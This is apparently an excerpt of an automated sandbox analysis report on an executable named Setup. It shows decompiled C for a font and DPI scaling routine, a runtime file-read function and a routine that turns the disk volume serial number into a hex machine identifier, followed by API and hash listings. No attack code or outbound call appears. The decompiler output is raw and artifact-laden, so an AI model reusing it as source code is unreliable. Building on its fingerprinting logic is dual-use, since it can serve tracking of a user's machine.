                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 00495E66
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcslen$BackslashIterator_baseIterator_base::_OpenPathQueryValue_memsetstd::_
                                                                                                                                                              • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\
                                                                                                                                                              • API String ID: 3112264913-2411794369
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 1114 424280-4242f2 GetDC 1115 4242f4-4242fa 1114->1115 1116 424325 1114->1116 1115->1116 1117 424313-42431a 1115->1117 1118 424301-424308 1115->1118 1119 42430a-424311 1115->1119 1120 42431c-424323 1115->1120 1121 42432c-42433d 1116->1121 1117->1121 1118->1121 1119->1121 1120->1121 1122 42433f-424347 1121->1122 1123 42435c-424360 1121->1123 1122->1123 1124 424349-424358 1122->1124 1125 424362-424368 1123->1125 1126 424377-424383 1123->1126 1124->1123 1125->1126 1127 42436a-424375 1125->1127 1128 424389-424390 1126->1128 1127->1128 1129 424392-424396 1128->1129 1130 4243d7-4243de 1128->1130 1131 424398-4243bc GetDeviceCaps MulDiv 1129->1131 1132 4243be-4243d1 MulDiv 1129->1132 1133 4243e9-4243f1 1130->1133 1131->1130 1132->1130 1134 4243f3-4243f7 1133->1134 1135 424436-42443a 1133->1135 1134->1135 1136 4243f9-424429 call 424140 1134->1136 1137 424463-424467 1135->1137 1138 42443c-424461 GetDeviceCaps MulDiv 1135->1138 1143 42442e-424434 1136->1143 1140 424479-424495 ReleaseDC call 44f6c8 1137->1140 1141 424469-424476 call 45184a 1137->1141 1138->1137 1141->1140 1143->1133
                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E00424280(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed short* _a20) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				char* _v12;
                                                                                                                                                              				char* _v16;
                                                                                                                                                              				char* _v20;
                                                                                                                                                              				char* _v24;
                                                                                                                                                              				struct HWND__* _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				char _v100;
                                                                                                                                                              				signed int _v104;
                                                                                                                                                              				signed int _v108;
                                                                                                                                                              				struct HDC__* _v112;
                                                                                                                                                              				struct HWND__* _v116;
                                                                                                                                                              				intOrPtr _v164;
                                                                                                                                                              				void* _v176;
                                                                                                                                                              				int _v180;
                                                                                                                                                              				signed int _v184;
                                                                                                                                                              				signed int _t80;
                                                                                                                                                              				struct HWND__* _t103;
                                                                                                                                                              				void* _t113;
                                                                                                                                                              				void* _t141;
                                                                                                                                                              				void* _t142;
                                                                                                                                                              				signed int _t143;
                                                                                                                                                              				void* _t144;
                                                                                                                                                              
                                                                                                                                                              				_t142 = __esi;
                                                                                                                                                              				_t141 = __edi;
                                                                                                                                                              				_t113 = __ebx;
                                                                                                                                                              				_t80 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v32 = _t80 ^ _t143;
                                                                                                                                                              				_v104 = 1;
                                                                                                                                                              				_v112 = GetDC(0);
                                                                                                                                                              				_v28 = 0;
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v20 = L"Tahoma";
                                                                                                                                                              				_v16 = L"MS Sans Serif";
                                                                                                                                                              				_v12 = L"Arial";
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v184 = _a4 & 0x000000ff;
                                                                                                                                                              				_v184 = _v184 - 0x80;
                                                                                                                                                              				if(_v184 > 8) {
                                                                                                                                                              					L6:
                                                                                                                                                              					_v104 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					switch( *((intOrPtr*)(_v184 * 4 +  &M00424498))) {
                                                                                                                                                              						case 0:
                                                                                                                                                              							_v24 = L"MS UI Gothic";
                                                                                                                                                              							goto L7;
                                                                                                                                                              						case 1:
                                                                                                                                                              							_v24 = L"Gulim";
                                                                                                                                                              							goto L7;
                                                                                                                                                              						case 2:
                                                                                                                                                              							goto L6;
                                                                                                                                                              						case 3:
                                                                                                                                                              							_v24 = L"SimSun";
                                                                                                                                                              							goto L7;
                                                                                                                                                              						case 4:
                                                                                                                                                              							_v24 = L"PMingLiU";
                                                                                                                                                              							goto L7;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				L7:
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				_v108 =  ~_v104 + 2;
                                                                                                                                                              				if(_a20 != 0 && ( *_a20 & 0x0000ffff) != 0) {
                                                                                                                                                              					_v108 = _v108 - 1;
                                                                                                                                                              					 *((intOrPtr*)(_t143 + _v108 * 4 - 0x18)) = _a20;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a8 == 0 ||  *_a8 == 0) {
                                                                                                                                                              					_v180 = (0 | _v104 != 0x00000000) + 9;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v180 =  *_a8;
                                                                                                                                                              				}
                                                                                                                                                              				if(_v180 > 0) {
                                                                                                                                                              					if(_a16 == 0) {
                                                                                                                                                              						_v180 =  ~(MulDiv(_v180, 0x60, 0x48));
                                                                                                                                                              					} else {
                                                                                                                                                              						_v180 =  ~(MulDiv(_v180, GetDeviceCaps(_v112, 0x5a), 0x48));
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_v116 = 0;
                                                                                                                                                              				while( *((intOrPtr*)(_t143 + _v108 * 4 - 0x18)) != 0 && _v116 == 0) {
                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                              					_t103 = E00424140(_t113, _t141, _t142,  *((intOrPtr*)(_t143 + _v108 * 4 - 0x18)), _a4 & 0x000000ff, _v180, _a12, _v112,  &_v100,  ~_a8 &  &_v176); // executed
                                                                                                                                                              					_t144 = _t144 + 0x1c;
                                                                                                                                                              					_v116 = _t103;
                                                                                                                                                              					_v108 = _v108 + 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a8 != 0) {
                                                                                                                                                              					 *_a8 = MulDiv(_v176 - _v164, 0x48, GetDeviceCaps(_v112, 0x5a));
                                                                                                                                                              				}
                                                                                                                                                              				if(_a20 != 0) {
                                                                                                                                                              					E0045184A(_a20,  &_v100);
                                                                                                                                                              				}
                                                                                                                                                              				ReleaseDC(0, _v112);
                                                                                                                                                              				return E0044F6C8(_v116, _t113, _v32 ^ _t143, _v112, _t141, _t142);
                                                                                                                                                              			}



























                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 0042429C
                                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 004243A0
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 004243AE
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000060,00000048), ref: 004243C9
                                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 00424442
                                                                                                                                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00424458
                                                                                                                                                              • _wcscpy.LIBCMT ref: 00424471
                                                                                                                                                              • ReleaseDC.USER32 ref: 0042447F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsDevice$Release_wcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 218543050-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004547CB(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				char* _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* __ebp;
                                                                                                                                                              				signed int _t90;
                                                                                                                                                              				intOrPtr* _t92;
                                                                                                                                                              				signed int _t94;
                                                                                                                                                              				char _t97;
                                                                                                                                                              				signed int _t105;
                                                                                                                                                              				void* _t106;
                                                                                                                                                              				signed int _t107;
                                                                                                                                                              				signed int _t110;
                                                                                                                                                              				signed int _t113;
                                                                                                                                                              				intOrPtr* _t114;
                                                                                                                                                              				signed int _t118;
                                                                                                                                                              				signed int _t119;
                                                                                                                                                              				signed int _t120;
                                                                                                                                                              				char* _t121;
                                                                                                                                                              				signed int _t125;
                                                                                                                                                              				signed int _t131;
                                                                                                                                                              				signed int _t133;
                                                                                                                                                              				void* _t134;
                                                                                                                                                              
                                                                                                                                                              				_t125 = __edx;
                                                                                                                                                              				_t121 = _a4;
                                                                                                                                                              				_t119 = _a8;
                                                                                                                                                              				_t131 = 0;
                                                                                                                                                              				_v12 = _t121;
                                                                                                                                                              				_v8 = _t119;
                                                                                                                                                              				if(_a12 == 0 || _a16 == 0) {
                                                                                                                                                              					L5:
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t138 = _t121;
                                                                                                                                                              					if(_t121 != 0) {
                                                                                                                                                              						_t133 = _a20;
                                                                                                                                                              						__eflags = _t133;
                                                                                                                                                              						if(_t133 == 0) {
                                                                                                                                                              							L9:
                                                                                                                                                              							__eflags = _t119 - 0xffffffff;
                                                                                                                                                              							if(_t119 != 0xffffffff) {
                                                                                                                                                              								_t90 = E00451D90(_t131, _t121, _t131, _t119);
                                                                                                                                                              								_t134 = _t134 + 0xc;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _t133 - _t131;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								goto L3;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t94 = _t90 | 0xffffffff;
                                                                                                                                                              								_t125 = _t94 % _a12;
                                                                                                                                                              								__eflags = _a16 - _t94 / _a12;
                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                              									goto L3;
                                                                                                                                                              								}
                                                                                                                                                              								L13:
                                                                                                                                                              								_t131 = _a12 * _a16;
                                                                                                                                                              								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                              								_v20 = _t131;
                                                                                                                                                              								_t120 = _t131;
                                                                                                                                                              								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                              									_v16 = 0x1000;
                                                                                                                                                              								} else {
                                                                                                                                                              									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t131;
                                                                                                                                                              								if(_t131 == 0) {
                                                                                                                                                              									L40:
                                                                                                                                                              									return _a16;
                                                                                                                                                              								} else {
                                                                                                                                                              									do {
                                                                                                                                                              										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                              										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                              											L24:
                                                                                                                                                              											__eflags = _t120 - _v16;
                                                                                                                                                              											if(_t120 < _v16) {
                                                                                                                                                              												_t97 = E004610BF(_t120, _t125, _t133); // executed
                                                                                                                                                              												__eflags = _t97 - 0xffffffff;
                                                                                                                                                              												if(_t97 == 0xffffffff) {
                                                                                                                                                              													L48:
                                                                                                                                                              													return (_t131 - _t120) / _a12;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = _v8;
                                                                                                                                                              												if(_v8 == 0) {
                                                                                                                                                              													L44:
                                                                                                                                                              													__eflags = _a8 - 0xffffffff;
                                                                                                                                                              													if(__eflags != 0) {
                                                                                                                                                              														E00451D90(_t131, _a4, 0, _a8);
                                                                                                                                                              														_t134 = _t134 + 0xc;
                                                                                                                                                              													}
                                                                                                                                                              													 *((intOrPtr*)(E00454477(__eflags))) = 0x22;
                                                                                                                                                              													_push(0);
                                                                                                                                                              													_push(0);
                                                                                                                                                              													_push(0);
                                                                                                                                                              													_push(0);
                                                                                                                                                              													_push(0);
                                                                                                                                                              													L4:
                                                                                                                                                              													E004557A5(_t125, _t131, _t133);
                                                                                                                                                              													goto L5;
                                                                                                                                                              												}
                                                                                                                                                              												_t123 = _v12;
                                                                                                                                                              												_v12 = _v12 + 1;
                                                                                                                                                              												 *_v12 = _t97;
                                                                                                                                                              												_t120 = _t120 - 1;
                                                                                                                                                              												_t70 =  &_v8;
                                                                                                                                                              												 *_t70 = _v8 - 1;
                                                                                                                                                              												__eflags =  *_t70;
                                                                                                                                                              												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                              												goto L39;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags = _v16;
                                                                                                                                                              											if(_v16 == 0) {
                                                                                                                                                              												_t105 = 0x7fffffff;
                                                                                                                                                              												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                              												if(_t120 <= 0x7fffffff) {
                                                                                                                                                              													_t105 = _t120;
                                                                                                                                                              												}
                                                                                                                                                              											} else {
                                                                                                                                                              												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                              												if(_t120 <= 0x7fffffff) {
                                                                                                                                                              													_t55 = _t120 % _v16;
                                                                                                                                                              													__eflags = _t55;
                                                                                                                                                              													_t125 = _t55;
                                                                                                                                                              													_t110 = _t120;
                                                                                                                                                              												} else {
                                                                                                                                                              													_t125 = 0x7fffffff % _v16;
                                                                                                                                                              													_t110 = 0x7fffffff;
                                                                                                                                                              												}
                                                                                                                                                              												_t105 = _t110 - _t125;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags = _t105 - _v8;
                                                                                                                                                              											if(_t105 > _v8) {
                                                                                                                                                              												goto L44;
                                                                                                                                                              											} else {
                                                                                                                                                              												_push(_t105);
                                                                                                                                                              												_push(_v12);
                                                                                                                                                              												_t106 = E004544C0(_t125, _t131, _t133);
                                                                                                                                                              												_pop(_t123);
                                                                                                                                                              												_push(_t106); // executed
                                                                                                                                                              												_t107 = E004617AC(_t120, _t125, _t131, _t133, __eflags); // executed
                                                                                                                                                              												_t134 = _t134 + 0xc;
                                                                                                                                                              												__eflags = _t107;
                                                                                                                                                              												if(_t107 == 0) {
                                                                                                                                                              													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                              													goto L48;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = _t107 - 0xffffffff;
                                                                                                                                                              												if(_t107 == 0xffffffff) {
                                                                                                                                                              													L47:
                                                                                                                                                              													_t80 = _t133 + 0xc;
                                                                                                                                                              													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                              													__eflags =  *_t80;
                                                                                                                                                              													goto L48;
                                                                                                                                                              												}
                                                                                                                                                              												_v12 = _v12 + _t107;
                                                                                                                                                              												_t120 = _t120 - _t107;
                                                                                                                                                              												_v8 = _v8 - _t107;
                                                                                                                                                              												goto L39;
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              										_t113 =  *(_t133 + 4);
                                                                                                                                                              										__eflags = _t113;
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											goto L24;
                                                                                                                                                              										}
                                                                                                                                                              										if(__eflags < 0) {
                                                                                                                                                              											goto L47;
                                                                                                                                                              										}
                                                                                                                                                              										_t131 = _t120;
                                                                                                                                                              										__eflags = _t120 - _t113;
                                                                                                                                                              										if(_t120 >= _t113) {
                                                                                                                                                              											_t131 = _t113;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags = _t131 - _v8;
                                                                                                                                                              										if(_t131 > _v8) {
                                                                                                                                                              											_t133 = 0;
                                                                                                                                                              											__eflags = _a8 - 0xffffffff;
                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                              												E00451D90(_t131, _a4, 0, _a8);
                                                                                                                                                              												_t134 = _t134 + 0xc;
                                                                                                                                                              											}
                                                                                                                                                              											_t114 = E00454477(__eflags);
                                                                                                                                                              											_push(_t133);
                                                                                                                                                              											_push(_t133);
                                                                                                                                                              											_push(_t133);
                                                                                                                                                              											_push(_t133);
                                                                                                                                                              											 *_t114 = 0x22;
                                                                                                                                                              											_push(_t133);
                                                                                                                                                              											goto L4;
                                                                                                                                                              										} else {
                                                                                                                                                              											E0044F6D7(_t120, _t123, _v12, _v8,  *_t133, _t131);
                                                                                                                                                              											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                              											 *_t133 =  *_t133 + _t131;
                                                                                                                                                              											_v12 = _v12 + _t131;
                                                                                                                                                              											_t120 = _t120 - _t131;
                                                                                                                                                              											_t134 = _t134 + 0x10;
                                                                                                                                                              											_v8 = _v8 - _t131;
                                                                                                                                                              											_t131 = _v20;
                                                                                                                                                              										}
                                                                                                                                                              										L39:
                                                                                                                                                              										__eflags = _t120;
                                                                                                                                                              									} while (_t120 != 0);
                                                                                                                                                              									goto L40;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t118 = _t90 | 0xffffffff;
                                                                                                                                                              						_t90 = _t118 / _a12;
                                                                                                                                                              						_t125 = _t118 % _a12;
                                                                                                                                                              						__eflags = _a16 - _t90;
                                                                                                                                                              						if(_a16 <= _t90) {
                                                                                                                                                              							goto L13;
                                                                                                                                                              						}
                                                                                                                                                              						goto L9;
                                                                                                                                                              					}
                                                                                                                                                              					L3:
                                                                                                                                                              					_t92 = E00454477(_t138);
                                                                                                                                                              					_push(_t131);
                                                                                                                                                              					_push(_t131);
                                                                                                                                                              					_push(_t131);
                                                                                                                                                              					_push(_t131);
                                                                                                                                                              					 *_t92 = 0x16;
                                                                                                                                                              					_push(_t131);
                                                                                                                                                              					goto L4;
                                                                                                                                                              				}
                                                                                                                                                              			}

                                                                                                                                                              0x004548e0
                                                                                                                                                              0x004548e3
                                                                                                                                                              0x004548d5
                                                                                                                                                              0x004548d7
                                                                                                                                                              0x004548da
                                                                                                                                                              0x004548da
                                                                                                                                                              0x004548e5
                                                                                                                                                              0x004548e5
                                                                                                                                                              0x004548f4
                                                                                                                                                              0x004548f7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004548fd
                                                                                                                                                              0x004548fd
                                                                                                                                                              0x004548fe
                                                                                                                                                              0x00454902
                                                                                                                                                              0x00454907
                                                                                                                                                              0x00454908
                                                                                                                                                              0x00454909
                                                                                                                                                              0x0045490e
                                                                                                                                                              0x00454911
                                                                                                                                                              0x00454913
                                                                                                                                                              0x004549cf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004549cf
                                                                                                                                                              0x00454919
                                                                                                                                                              0x0045491c
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004549bd
                                                                                                                                                              0x00454922
                                                                                                                                                              0x00454925
                                                                                                                                                              0x00454927
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454927
                                                                                                                                                              0x004548f7
                                                                                                                                                              0x0045487b
                                                                                                                                                              0x0045487e
                                                                                                                                                              0x00454880
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454882
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454888
                                                                                                                                                              0x0045488a
                                                                                                                                                              0x0045488c
                                                                                                                                                              0x0045488e
                                                                                                                                                              0x0045488e
                                                                                                                                                              0x00454890
                                                                                                                                                              0x00454893
                                                                                                                                                              0x00454964
                                                                                                                                                              0x00454966
                                                                                                                                                              0x0045496a
                                                                                                                                                              0x00454973
                                                                                                                                                              0x00454978
                                                                                                                                                              0x00454978
                                                                                                                                                              0x0045497b
                                                                                                                                                              0x00454980
                                                                                                                                                              0x00454981
                                                                                                                                                              0x00454982
                                                                                                                                                              0x00454983
                                                                                                                                                              0x00454984
                                                                                                                                                              0x0045498a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454899
                                                                                                                                                              0x004548a2
                                                                                                                                                              0x004548a7
                                                                                                                                                              0x004548aa
                                                                                                                                                              0x004548ac
                                                                                                                                                              0x004548af
                                                                                                                                                              0x004548b1
                                                                                                                                                              0x004548b4
                                                                                                                                                              0x004548b7
                                                                                                                                                              0x004548b7
                                                                                                                                                              0x00454954
                                                                                                                                                              0x00454954
                                                                                                                                                              0x00454954
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454872
                                                                                                                                                              0x0045486c
                                                                                                                                                              0x00454837
                                                                                                                                                              0x00454818
                                                                                                                                                              0x0045481d
                                                                                                                                                              0x0045481d
                                                                                                                                                              0x00454820
                                                                                                                                                              0x00454823
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454823
                                                                                                                                                              0x004547f2
                                                                                                                                                              0x004547f2
                                                                                                                                                              0x004547f7
                                                                                                                                                              0x004547f8
                                                                                                                                                              0x004547f9
                                                                                                                                                              0x004547fa
                                                                                                                                                              0x004547fb
                                                                                                                                                              0x00454801
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00454801

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3886058894-0
                                                                                                                                                              • Opcode ID: 24e9373897bc8a5cc2d72240ab2ba003cf9559ff3a241c8706108772e9f9b500
                                                                                                                                                              • Instruction ID: b48dc7675cf6e0c95097a90f61d0df77d4aa9603786d68242fc11d6efe4b1aba
                                                                                                                                                              • Opcode Fuzzy Hash: 24e9373897bc8a5cc2d72240ab2ba003cf9559ff3a241c8706108772e9f9b500
                                                                                                                                                              • Instruction Fuzzy Hash: 8A510A74900244EBCB209FB9884559F7BB5EFC132DF14821BFC259A292D3389D99CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E00482980(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char* _v20;
                                                                                                                                                              				long _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				char _v60;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				char _v328;
                                                                                                                                                              				short _v330;
                                                                                                                                                              				intOrPtr _v334;
                                                                                                                                                              				short _v336;
                                                                                                                                                              				char _v400;
                                                                                                                                                              				char _v416;
                                                                                                                                                              				WCHAR* _v420;
                                                                                                                                                              				char _v421;
                                                                                                                                                              				char _v422;
                                                                                                                                                              				signed int _v428;
                                                                                                                                                              				signed int _t52;
                                                                                                                                                              				signed int _t53;
                                                                                                                                                              				signed int _t79;
                                                                                                                                                              				signed int _t112;
                                                                                                                                                              				void* _t113;
                                                                                                                                                              				void* _t120;
                                                                                                                                                              
                                                                                                                                                              				_t111 = __esi;
                                                                                                                                                              				_t110 = __edi;
                                                                                                                                                              				_t80 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50a68e);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t52 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t53 = _t52 ^ _t112;
                                                                                                                                                              				_v32 = _t53;
                                                                                                                                                              				_push(_t53);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v428 = 0;
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				E004175C0(E00434050( &_v421));
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				_v336 = 0;
                                                                                                                                                              				_v334 = 0;
                                                                                                                                                              				_v330 = 0;
                                                                                                                                                              				E00495D00(__ebx, __edi, __esi, 0x23,  &_v64, 1, 1); // executed
                                                                                                                                                              				E0045508B(E00416A30( &_v60),  &_v336, 0, 0, 0);
                                                                                                                                                              				PathAddBackslashW( &_v336);
                                                                                                                                                              				GetVolumeInformationW( &_v336, 0, 0,  &_v24, 0, 0, 0, 0); // executed
                                                                                                                                                              				_v28 = E00453304(__edi, __esi,  &_v416, "%.8x", _v24);
                                                                                                                                                              				E004827F0(_a8, E00451E10(_a8),  &_v328);
                                                                                                                                                              				E004826C0( &_v416, _v28,  &_v328);
                                                                                                                                                              				_t120 = _t113 - 0x19c + 0x4c;
                                                                                                                                                              				_v20 =  &_v400;
                                                                                                                                                              				_v420 = 0;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t107 = _v420;
                                                                                                                                                              					if(_v420 >= _v28) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t79 = E00448860(_v20, L"%x",  *(_t112 + _v420 - 0x19c) & 0x000000ff);
                                                                                                                                                              					_t120 = _t120 + 0xc;
                                                                                                                                                              					_v20 = _v20 + _t79 * 2;
                                                                                                                                                              					_v420 =  &(_v420[0]);
                                                                                                                                                              				}
                                                                                                                                                              				E00417910( &_v400, E00434050( &_v422));
                                                                                                                                                              				_v428 = _v428 | 0x00000001;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_a4, _t80, _v32 ^ _t112, _t107, _t110, _t111);
                                                                                                                                                              			}




























                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00495D00: _memset.LIBCMT ref: 00495D56
                                                                                                                                                                • Part of subcall function 00495D00: SHGetFolderPathW.SHELL32(00000000,004CC849,00000000,00000000,?,?,?,DDD124F9), ref: 00495D6F
                                                                                                                                                                • Part of subcall function 00495D00: PathAddBackslashW.SHLWAPI(?,?,?,DDD124F9), ref: 00495D93
                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00482A17
                                                                                                                                                                • Part of subcall function 0045508B: __wsplitpath_helper.LIBCMT ref: 004550CD
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?), ref: 00482A26
                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00482A43
                                                                                                                                                              • _sprintf.LIBCMT ref: 00482A59
                                                                                                                                                              • _strlen.LIBCMT ref: 00482A6F
                                                                                                                                                                • Part of subcall function 00448860: __vswprintf.LIBCMT ref: 00448878
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
